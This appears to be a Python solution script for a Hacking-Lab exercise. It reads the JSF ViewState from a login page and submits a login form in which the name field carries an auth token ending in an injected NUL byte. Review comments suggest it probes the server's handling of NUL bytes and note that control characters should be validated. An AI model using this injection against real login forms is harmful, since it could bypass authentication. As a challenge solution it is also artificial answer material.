#!/usr/bin/python
import requests
from bs4 import BeautifulSoup as bs
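# Target form of the exercise.
# NOTE(review): the scheme is plain http, so the submitted form fields
# (including the token below) travel unencrypted.
URL = "http://whale.hacking-lab.com:8888/trieme/index.xhtml"

# Seconds to wait on each request. requests has no default timeout, so
# without this an unresponsive host would block the script indefinitely.
TIMEOUT = 10

# Id of the hidden input that carries the JSF view state.
VIEW_STATE_ID = "javax.faces.ViewState"


def _require_ok(response):
    """Exit with status 1 unless the server answered with HTTP 200."""
    if response.status_code != 200:
        print("Server returned %d %s" % (response.status_code, response.reason))
        raise SystemExit(1)


# One Session is used for both requests so cookies set by the GET are sent
# with the POST (presumably the view state is bound to that server session).
with requests.Session() as session:
    # Get view state
    response = session.get(URL, timeout=TIMEOUT)
    _require_ok(response)

    html = bs(response.text, 'lxml')
    viewState = html.find("input", {"id": VIEW_STATE_ID})
    # Also reject an input that exists but has no (or an empty) value
    # attribute; indexing it would otherwise raise KeyError further down.
    if viewState is None or not viewState.get("value"):
        print("Could not find javax.faces.ViewState")
        raise SystemExit(2)

    # Form fields of the login form. The "j_idt14*" names look like ids that
    # JSF auto-generates for components without an explicit id, so they may
    # change whenever the page is rebuilt. TODO confirm against the live page.
    params = {
        "j_idt14": "j_idt14",
        "j_idt14:j_idt15": "login",
        # The submitted name deliberately ends in a NUL byte ("\0").
        # NOTE(review): presumably the exercise is about how the server
        # treats an embedded NUL in this field; the defensive takeaway is
        # that server-side validation should reject control characters
        # before the value reaches any comparison or lookup.
        "j_idt14:name": "auth_token_4835989\0",
        VIEW_STATE_ID: viewState["value"],
    }

    response = session.post(URL, data=params, timeout=TIMEOUT)
    _require_ok(response)

    print(response.text)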